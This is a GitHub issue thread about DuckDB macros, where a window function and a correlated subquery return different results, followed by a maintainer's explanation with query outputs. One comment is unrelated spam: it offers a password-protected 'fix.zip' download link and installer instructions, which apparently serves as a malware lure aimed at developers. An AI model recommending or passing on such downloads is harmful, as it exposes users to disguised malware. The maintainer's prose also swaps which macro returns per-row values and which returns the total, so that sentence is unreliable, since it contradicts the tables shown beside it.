### ISSUE TITLE
Equivalent MACRO definitions yield different results

### ISSUE THREAD

**Issue by lschneiderbauer** [duckdb/duckdb#13615]
### What happens?

It is my understanding that
```sql
CREATE MACRO s2(x) AS (sum(x) OVER());
```
and
```sql
CREATE MACRO s1(x) AS (SELECT sum(y) OVER() FROM (SELECT x AS y));
```
should yield identical results. They produce, however, different results.

If `s1()` is for some reason not allowed, it should at least issue an error instead of providing a wrong result.

In this example it is easy to workaround (by choosing `s2()` instead of `s1()`). But when using it in more complex context, such a subquery construction might become necessary to e.g. avoid a "nested window functions not allowed" error.

### To Reproduce

```sql
CREATE TABLE tab (x int);

INSERT INTO tab VALUES (3);
INSERT INTO tab VALUES (7);

CREATE MACRO s1(x) AS (SELECT sum(y) OVER() FROM (SELECT x AS y));
CREATE MACRO s2(x) AS (sum(x) OVER());

SELECT s1(x), s2(x) FROM tab;
```

Output:
```
┌───────┬───────┐
│ s1(x) ┆ s2(x) │
╞═══════╪═══════╡
│     3 ┆    10 │
│     7 ┆    10 │
└───────┴───────┘
```

### OS:

MS Windows 10, x64

### DuckDB Version:

1.0.0

### DuckDB Client:

Wasm

### Full Name:

Lukas Schneiderbauer

### Affiliation:

None

### What is the latest build you tested with? If possible, we recommend testing with the latest nightly build.

I have tested with a stable release

### Did you include all relevant data sets for reproducing the issue?

Not applicable - the reproduction does not require a data set

### Did you include all code required to reproduce the issue?

- [X] Yes, I have

### Did you include all relevant configuration (e.g., CPU architecture, Python version, Linux distribution) to reproduce the issue?

- [X] Yes, I have

**Comment by scheichreisuli** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Mytherin** [comment]
Thanks for the report!

The expressions are not equivalent, which is why they provide different results. They are not equivalent because `s2` is executing a window function over the *entire* content of the table. `s1`  is executing a correlated subquery, which are evaluated *per-row*. This is why you see `s1` returning the *total* sum, and `s2`  returning the same value of `x` for every row.

Macros are just a substitution of an expression, you can see that the macros provide the same result as the expanded SQL:

```sql
D SELECT s1(x), (SELECT sum(y) OVER() FROM (SELECT x AS y)) AS expanded from tab;
┌────────┬──────────┐
│ s1(x)  │ expanded │
│ int128 │  int128  │
├────────┼──────────┤
│      3 │        3 │
│      7 │        7 │
└────────┴──────────┘
D SELECT s2(x), sum(x) over () AS expanded FROM tab;
┌────────┬──────────┐
│ s2(x)  │ expanded │
│ int128 │  int128  │
├────────┼──────────┤
│     10 │       10 │
│     10 │       10 │
└────────┴──────────┘
```

You can also see that both of these queries return the same result in other SQL systems, like Postgres:

```sql
postgres=# select (SELECT sum(y) OVER() FROM (SELECT x AS y) t) from tab;
 sum 
-----
   3
   7
(2 rows)

postgres=# select sum(x) over () from tab;
 sum 
-----
  10
  10
(2 rows)
```

If you want a subquery to run over the entire content of a table, you need to add it in the `FROM` clause of a subquery, e.g.:

```sql
D SELECT x, (SELECT SUM(x) FROM tab) AS full_subquery from tab;
┌───────┬───────────────┐
│   x   │ full_subquery │
│ int32 │    int128     │
├───────┼───────────────┤
│     3 │            10 │
│     7 │            10 │
└───────┴───────────────┘
```

**Comment by lschneiderbauer** [comment]
Thank you for the elaborate explanation and cleaning up my misconceptions!
